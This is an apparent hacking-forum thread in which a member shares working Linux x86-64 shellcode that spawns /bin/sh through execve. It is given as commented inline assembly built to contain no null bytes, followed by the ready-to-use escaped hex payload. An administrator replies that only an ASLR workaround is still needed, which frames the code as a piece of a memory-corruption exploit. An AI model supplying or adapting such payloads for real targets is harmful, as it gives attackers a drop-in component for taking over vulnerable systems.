XR3X
Clicky

Jump to content


Photo

Shellcode Linux 64 bit


  • You cannot start a new topic
  • Please log in to reply
1 reply to this topic

#1 mh4

mh4

    Member

  • Members +
  • 32 posts
  • Location\0x414141

Posted 06 April 2014 - 04:54 AM

//executando bin/sh
// gcc -o shell shell.c 
int main() {
/*
*******************************
#include <stdlib.h>
int main() {
  execve("/bin/sh", NULL, NULL);
}
*******************************
*/
__asm__(
"xor    %rdx,%rdx\n\t"                // arg 3 = NULL
"mov    %rdx,%rsi\n\t"                // arg 2 = NULL
"mov    $0x1168732f6e69622f,%rdi\n\t"
"shl    $0x8,%rdi\n\t"                
"shr    $0x8,%rdi\n\t"                
"push   %rdi\n\t"                     //  /bin/sh in stack
"mov    %rsp,%rdi\n\t"                
"mov    $0x111111111111113b,%rax\n\t" // syscall number  = 59
"shl    $0x38,%rax\n\t"         
"shr    $0x38,%rax\n\t"               
"syscall\n\t"
);
}
payload in ASCII
"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05"
 
follow me my github :

Please Login or Register to see this Hidden Content


  • x58 and erik_v4 like this

#2 x58

x58

    Advanced

  • Administrators
  • 4,729 posts
Contributor

Posted 06 April 2014 - 10:04 PM

Now you only need a workaround for ASLR.

 

Btw the shellcode is in hex format.


Regards,


FAQ
Rules and Regulations
Supporting hackhound
-
Server status / Twitter
P2P blocklist

HackHound.org HackHound.co DarkMindz.iNFO
HackHood.co CodeCave.space